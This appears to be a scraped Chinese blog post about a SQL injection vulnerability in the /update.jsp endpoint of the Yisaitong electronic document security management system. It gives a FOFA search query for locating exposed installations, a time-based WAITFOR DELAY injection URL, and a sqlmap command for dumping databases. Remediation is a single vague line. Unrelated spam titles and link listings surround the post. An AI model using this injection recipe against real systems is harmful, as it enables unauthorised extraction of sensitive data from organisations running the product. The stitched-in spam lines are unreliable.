当前位置: 首页 > news >正文

个人网站设计及实现论文杭州市做网站的公司

个人网站设计及实现论文,杭州市做网站的公司,哈尔滨模板建站系统,erp系统下载目录 0x01 漏洞介绍 0x02 影响产品 0x03 语法特征 0x04 漏洞复现页面 0x05 漏洞修复建议 0x01 漏洞介绍 亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台&#…

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议


0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 
  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 
  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

图片

                                                   没看够~?欢迎关注扫一扫~

http://www.yayakq.cn/news/974669/

相关文章:

  • 装修公司网站源码php电商营销渠道有哪些
  • 惠州网站推广app开发大概要多少钱
  • 网站开发的英文书有什么iis6建设网站
  • 哪些网站比较容易做珠海网站建设
  • 上传网站软件备案域名查询官网
  • 廊坊网站关键词排名下载网站模板后本地的网站会自动做跳转
  • 单页响应式网站模板零基础学习做网站
  • 长春火车站时刻表极简网站模板
  • 峨山网站建设山东外贸网站是什么意思
  • 网站收录查询爱站2020新闻大事件摘抄
  • 成都科技网站建设电话辽宁省建设工程信息网入辽打印
  • 农药放行单在哪个网站做省建设厅网站安徽
  • 全自动网站建设宠物网站项目
  • 网站开发core文件作用php一个空间放多个网站
  • 坪地网站建设如何网站页面图片尺寸
  • 安居网站建设动画制作软件免费
  • 公众号里的电影网站怎么做的免费网站加速服务
  • 大型网站建设规范佛山网站优化流程
  • 内推网站最好的网站模板下载网站
  • 建网站的意义视频制作软件哪个好 前十名
  • 公司的网站如何做成都优化网站推广
  • 苏州市城乡和建设局网站网站建设方案.doc
  • 标准品购买网站用jsp做校园网站
  • 网站建设980元网站制作电话
  • 网站建设6135678单仁牛商
  • 网站交易平台织梦网站如何做软件下载
  • 电视台网站模版佛山市网络seo推广公司
  • 关键词设定在网站上全国中高风险地区最新名单
  • 便宜的做网站公司网站人群分析
  • 以公司做网站毕业设计软件开发网站开发